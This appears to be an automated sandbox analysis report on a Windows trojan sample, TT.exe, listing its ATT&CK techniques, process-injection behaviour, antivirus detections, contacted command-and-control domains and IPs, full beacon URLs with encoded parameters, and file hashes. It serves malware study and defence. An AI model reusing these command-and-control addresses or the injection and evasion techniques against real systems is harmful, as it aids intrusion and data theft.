          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Rootkit1Credential API Hooking1Security Software Discovery131Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection512Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 403976 Sample: TT.exe Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 31 www.umlausa.com 2->31 33 umlausa.com 2->33 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 5 other signatures 2->47 11 TT.exe 19 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\myx92o78208f0o.dll, PE32 11->29 dropped 57 Detected unpacking (changes PE section rights) 11->57 59 Maps a DLL or memory area into another process 11->59 61 Tries to detect virtualization through RDTSC time measurements 11->61 15 TT.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.sectorulb.com 107.165.149.13, 49741, 80 EGIHOSTINGUS United States 18->35 37 philreid4cc.com 192.0.78.24, 49735, 80 AUTOMATTICUS United States 18->37 39 3 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 msdt.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TT.exe25%VirustotalBrowse
          TT.exe40%ReversingLabsWin32.Trojan.Predator
          TT.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nse2C42.tmp\myx92o78208f0o.dll9%ReversingLabsWin32.Trojan.Jaik

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.TT.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.TT.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.TT.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          7.2.msdt.exe.520f834.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.1.TT.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.TT.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          7.2.msdt.exe.2d06a10.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.TT.exe.3030000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          philreid4cc.com1%VirustotalBrowse
          lagrangewildliferemoval.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.lagrangewildliferemoval.com/dxe/?oZN=7nbLudZHS&mdslXXV=pSmvUx3Cd9o2ehLRUYmTuUG+rz67XAZoYuLBzxOhEanl5TCXMyweO2X8MqC68oVFQcjckZtQvA==0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.sectorulb.com/dxe/?mdslXXV=c1qXo+D3OeWS7aQwzsMJrh0J2W+ZcnXSIybZATOUAxrA4uZvd+OeJvPZ6sfOQ4L/XOcBlc02WQ==&oZN=7nbLudZHS0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.philreid4cc.com/dxe/?oZN=7nbLudZHS&mdslXXV=s4725d3Oabb4GJPvvzs1NGtrQqdCSFbT14B5hiC+hEbCkkM6v8NMU0M9YHV7hr/JdwNsVvK8Ug==0%Avira URL Cloudsafe
          www.knighttechinca.com/dxe/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          philreid4cc.com
          		192.0.78.24
          		truetrueunknown
          umlausa.com
          		34.98.99.30
          		truetrue
            		unknown
            www.sectorulb.com
            		107.165.149.13
            		truetrue
              		unknown
              lagrangewildliferemoval.com
              		107.180.41.236
              		truetrueunknown
              www.lagrangewildliferemoval.com
              		unknown
              		unknowntrue
                		unknown
                www.umlausa.com
                		unknown
                		unknowntrue
                  		unknown
                  www.philreid4cc.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.lagrangewildliferemoval.com/dxe/?oZN=7nbLudZHS&mdslXXV=pSmvUx3Cd9o2ehLRUYmTuUG+rz67XAZoYuLBzxOhEanl5TCXMyweO2X8MqC68oVFQcjckZtQvA==true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.sectorulb.com/dxe/?mdslXXV=c1qXo+D3OeWS7aQwzsMJrh0J2W+ZcnXSIybZATOUAxrA4uZvd+OeJvPZ6sfOQ4L/XOcBlc02WQ==&oZN=7nbLudZHStrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.philreid4cc.com/dxe/?oZN=7nbLudZHS&mdslXXV=s4725d3Oabb4GJPvvzs1NGtrQqdCSFbT14B5hiC+hEbCkkM6v8NMU0M9YHV7hr/JdwNsVvK8Ug==true
                    • Avira URL Cloud: safe
                    		unknown
                    www.knighttechinca.com/dxe/true
                    • Avira URL Cloud: safe
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000002.596476580.000000000095C000.00000004.00000020.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                		high
                                http://www.tiro.comexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                  		high
                                  http://nsis.sf.net/NSIS_ErrorErrorTT.exefalse
                                    		high
                                    http://www.goodfont.co.krexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comlexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://fontfabrik.comexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://nsis.sf.net/NSIS_ErrorTT.exefalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.fonts.comexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.sandoll.co.krexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sakkal.comexplorer.exe, 00000004.00000000.361956304.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              192.0.78.24
                                              		philreid4cc.comUnited States
                                              		2635AUTOMATTICUStrue
                                              107.180.41.236
                                              		lagrangewildliferemoval.comUnited States
                                              		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                              107.165.149.13
                                              		www.sectorulb.comUnited States
                                              		18779EGIHOSTINGUStrue

                                              General Information

                                              Joe Sandbox Version:32.0.0 Black Diamond
                                              Analysis ID:403976
                                              Start date:04.05.2021
                                              Start time:15:40:54
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 10m 7s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:TT.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:24
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@7/4@4/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 22.4% (good quality ratio 20.3%)
                                              • Quality average: 74.3%
                                              • Quality standard deviation: 30.9%
                                              HCA Information:
                                              • Successful, ratio: 90%
                                              • Number of executed functions: 103
                                              • Number of non-executed functions: 59
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              192.0.78.2408917506_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • www.sherylabrahamphotography.com/o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4HvmT9bEqgnu31MbrCbNdKakV5eJA==&Yn=ybdHh8KP02GTtb
                                              DVO100024000.docGet hashmaliciousBrowse
                                              • www.mariacolom.net/f0sg/?tDK=AymEOqKSVycllsucagJ3uquKzbaTRejMwBNJTz2lYWa4o9lkvFa+mpTu9QIvYFHSKZDd6A==&LPYP_=Sfgd
                                              lFfDzzZYTl.exeGet hashmaliciousBrowse
                                              • www.micheldrake.com/p2io/?_RAd4V=YL0THJvhl8d&iBIXf4M=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+a1hjfUwipOV1CQA6A==
                                              win32.exeGet hashmaliciousBrowse
                                              • www.jjwheelerphotography.com/hx3a/?ETPPOfO=HQ9W41OR6IY4WMlgz7ohhqskOlb/u2Nwhc+7no5Vp+hf9TuBBHO+5iRY2jTFM+WSMdE+&UR-hC=00Gdc830MjwppviP
                                              regasm.exeGet hashmaliciousBrowse
                                              • www.didsss.com/nqs9/?nbZdq4=dVfJ12aU7P1vtr0V7f4ZSuio1H1BmGrXzc61GzQ1cc/EKZrMEgEOFtlW/dhEQBMkQYhn&DxoTF=VBZHmLVX_dHX06
                                              oEWV80rj6fgwF5i.exeGet hashmaliciousBrowse
                                              • www.maseralda.com/ni6e/?nPntM8=dXbHup58-RGl&E6A=y8SBlkjU4W39Ly1T/KIONjFVZVrG132kczY/fXhHYMs1ha7B0OtwBDERUcslfp+UVYhd
                                              HG546092227865431209.exeGet hashmaliciousBrowse
                                              • www.richysculturalstuff.com/ct6a/?j2JHaJc=hKmAkhvb6mkv9zaFtr8IBA3Y8OUBY5g53ObP4/ibO16ZiyPs+HJ8s4t51tF1eI8O7LER&KthHT=LXaP
                                              invoice.exeGet hashmaliciousBrowse
                                              • www.legacyadmin.support/e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J+dvoSMZhdpoUDtYYFWxv9npQwlOrxt3zkZH4aLHtWZT3&uFQl=XP7HMT_8
                                              o2KKHvtb3c.exeGet hashmaliciousBrowse
                                              • www.translations.tools/nsag/?GTgP=1Yx90tXdezyuV8sDZLNplGUVoptWSuBjE4/oeiBfqPIPAmaYyomwKJS6i2A6lUxe1bSuh3UNpg==&5jr=UlSpj
                                              PO#41000055885.exeGet hashmaliciousBrowse
                                              • www.billpollakwritingandediting.com/s2oc/?GzrL=WBjT_rUpa&8pDp00Hp=iEnqtY0VDkZROpxH3svCV1z4vh0RNvDxHQ/1OCo0cqhO00C//BGB8bIyEE+Kz7q/Bf/i
                                              swift_76567643.exeGet hashmaliciousBrowse
                                              • www.robztech.com/m8es/?CVJ=t8DGnXKWWWU8raNxivnbQjw3Z37WBEdYjZZIAloy7atrUUbC+CA3ztV2uFkjRRfw03U+&oX9=Txo8ntB0WBsp
                                              PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                              • www.ichaugames.com/edbs/?LZ9p=YgPC843WNdMasmCWk8z83XX/O5HllNmlhNkRKlPYh5DfpYamg+RMipCIUjeKta/lrbmo&MnZ=GXLpz
                                              Swift.exeGet hashmaliciousBrowse
                                              • www.pranatarot.com/edbs/?M6AlI=DP8A5Ne5M9xGBq1tjWprXkQLMPcjoeoXNStDN+ay4cQr/vSv+J0F/9nmPhuRTLw7c/6NIAJFgw==&T8RH=9rqdJ4wpALk
                                              TNUiVpymgH.exeGet hashmaliciousBrowse
                                              • www.longdoggy.net/vu9b/?yhRdNvKX=NeJ6fTW54FiVLomARoXtZYU3dCbrOkLIBtzKWj45EW4cSvDsCI/Ad3ky2rZHNP/pygFH&Sj=CTFH
                                              Swift Advise.exeGet hashmaliciousBrowse
                                              • www.billpollakwritingandediting.com/s2oc/?Hlnxrrv=iEnqtY0VDkZROpxH3svCV1z4vh0RNvDxHQ/1OCo0cqhO00C//BGB8bIyEE+gsLa/Fd3i&N48xBX=5jrXZXrHL6gpNHc
                                              vfe1GoeC5F.exeGet hashmaliciousBrowse
                                              • www.emmajanetracy.com/iu4d/?wTPHg6=ZliXVxFXgH&F8Sl=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkLnRBXIBtcN
                                              New Purchase Order GH934782GHY489330.exeGet hashmaliciousBrowse
                                              • www.texasgirlcooks.com/n8ih/?FRd4X8=LwVPcdZXggMsOEqjpBC1UWbJi/W0BJRKlKtnOmrCDSW2VJzQcSCcpwg+xjq2DIU/ljr6&v8yH=ZPGXSpGP_
                                              enlu5xSNKV.exeGet hashmaliciousBrowse
                                              • www.mels.ink/jzvu/?T48h3FW=iJYv1UkuT0Zpi+IGsxHty87S2Dat4Pv7Wp3PPo6PPkk3ttxekOlDn9vNvymr9ZuQ7HO4&GPGXR=rVgD9v10QRyTEj
                                              KL9fcbfrMB.exeGet hashmaliciousBrowse
                                              • www.micheldrake.com/p2io/?TT=FjUh3Tu&idCtDnlP=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE
                                              Bs04AQyK2o.exeGet hashmaliciousBrowse
                                              • www.blake-skinner.com/cyna/?GzuD=PDCWDhm1FORq+rZomwaGxMfk5udIXQ8UnpXBsbRxRfrc3sHkOqGAjqDUEuQ1Be52SJ1X&AnB=O0DXDNwPE

                                              Domains

                                              No context

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AS-26496-GO-DADDY-COM-LLCUSSWIFT 00395_IMG.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              4GGwmv0AJm.exeGet hashmaliciousBrowse
                                              • 50.62.168.157
                                              c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              HAWB AND INV.exeGet hashmaliciousBrowse
                                              • 107.180.57.119
                                              Inquiry 05042021.docGet hashmaliciousBrowse
                                              • 107.180.43.16
                                              don.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              Comand#U0103 de achizi#U021bie PP050321.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              O1E623TjjW.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              product specification.xlsxGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              9DWvynenEDJ11fY.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              PURCHASE ORDER.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              ETC-B72-LT-0149-03-AR.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                              • 192.186.217.35
                                              SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                              • 192.186.217.35
                                              SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                              • 192.186.217.35
                                              SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                              • 192.186.217.35
                                              Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                              • 192.186.217.35
                                              Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                              • 192.186.217.35
                                              Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                              • 107.180.44.132
                                              SecuriteInfo.com.Heur.3421.xlsGet hashmaliciousBrowse
                                              • 192.186.217.35
                                              AUTOMATTICUS08917506_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              4GGwmv0AJm.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 192.0.78.12
                                              0d69e4f6_by_Libranalysis.xlsGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              wMqdemYyHm.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              MSUtbPjUGib2dvd.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              PROFORMA INVOICE-INV393456434.pdf.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              agnesng@hanglung.comOnedrive.htmlGet hashmaliciousBrowse
                                              • 192.0.77.2
                                              PO_29_00412.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              Enrollment_Benefits-2022.docxGet hashmaliciousBrowse
                                              • 192.0.66.2
                                              Enrollment_Benefits-2022.docxGet hashmaliciousBrowse
                                              • 192.0.66.2
                                              DVO100024000.docGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              ofert#U0103 comand#U0103 de cump#U0103rare_pdf.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              Rio International LLC URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              RDAx9iDSEL.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              order drawing 101.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              lFfDzzZYTl.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              SA-NQAW12n-NC9W03-pdf.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              SWIFT COPY.exeGet hashmaliciousBrowse
                                              • 192.0.78.246
                                              EGIHOSTINGUSa3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 104.252.43.114
                                              Airwaybill # 6913321715.exeGet hashmaliciousBrowse
                                              • 107.165.10.98
                                              PURCHASE ORDER.exeGet hashmaliciousBrowse
                                              • 45.38.16.182
                                              DocNo2300058329.doc__.rtfGet hashmaliciousBrowse
                                              • 104.252.43.114
                                              Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                              • 104.252.53.97
                                              pVrqrGltiL.exeGet hashmaliciousBrowse
                                              • 50.118.250.118
                                              PO#10244.exeGet hashmaliciousBrowse
                                              • 45.39.20.158
                                              M23ErBe32Z0IeOO.exeGet hashmaliciousBrowse
                                              • 104.252.6.32
                                              REVISED PURCHASE ORDER.exeGet hashmaliciousBrowse
                                              • 45.38.16.182
                                              z5Wqivscwd.exeGet hashmaliciousBrowse
                                              • 104.252.38.60
                                              New order.04272021.DOC.exeGet hashmaliciousBrowse
                                              • 166.88.252.48
                                              PI34567890987.exeGet hashmaliciousBrowse
                                              • 104.164.224.84
                                              PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exeGet hashmaliciousBrowse
                                              • 45.39.35.49
                                              Quotation Sheet - RFQ26042021.docGet hashmaliciousBrowse
                                              • 142.111.21.219
                                              Bank Details Pdf.exeGet hashmaliciousBrowse
                                              • 107.186.135.239
                                              DXBR001342103.exeGet hashmaliciousBrowse
                                              • 104.252.53.97
                                              5PthEm83NG.exeGet hashmaliciousBrowse
                                              • 142.111.47.2
                                              4EQNFqt5Nm.exeGet hashmaliciousBrowse
                                              • 107.164.222.94
                                              z3hir.x86Get hashmaliciousBrowse
                                              • 172.252.255.254
                                              Financial Results April 21.pptx (9,753K).exeGet hashmaliciousBrowse
                                              • 107.165.116.66

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\0y2c2kp8hi4mjyo
                                              Process:C:\Users\user\Desktop\TT.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6661
                                              Entropy (8bit):7.963770055031023
                                              Encrypted:false
                                              SSDEEP:192:SimHkX3ewaiyPJsxWqCU6B4/bHAde+xhUYX3br:SzkHhQPJsxLl+4/bHGe+xhU6br
                                              MD5:29D5136A5CEBC1CC9D92D96344C5B940
                                              SHA1:60CA9749C6D7927AE081E54333D7CEB0B1D90E71
                                              SHA-256:0A96FEF5360AF7477BE785AE5EA73E12B6CEE800CDCC4D405A2C9E6E8A8A5472
                                              SHA-512:8FAC511CDA60762BAC0C7A1C7C4D717D8066DFB43D7DF83EAB07C89239153D49849BFEA3AD60E74A9329C1A35E928EAE8E1E45DECF9FA3F7A1C3EC6B7149ACE7
                                              Malicious:false
                                              Reputation:low
